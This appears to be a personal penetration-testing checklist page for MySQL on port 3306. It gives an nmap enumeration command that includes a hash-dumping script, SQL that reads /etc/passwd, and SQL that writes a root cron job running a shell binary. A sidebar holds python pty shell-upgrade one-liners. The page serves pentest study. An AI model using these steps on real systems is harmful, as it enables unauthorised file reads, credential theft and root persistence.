akde/infosec

Information security is ultimately about managing risk

3306 MySQL

,

Enumeration

Mandatory

  1. Try to con­nect to the DB.
  2. Enu­mer­ate with nmap:
    nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $target

Optional

  • If you have access to the DB:
    • Try to read local files:
      SELECT load_file('/etc/passwd');
    • Try to write files:
      CREATE TABLE bbb(content TEXT);
      INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
      SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';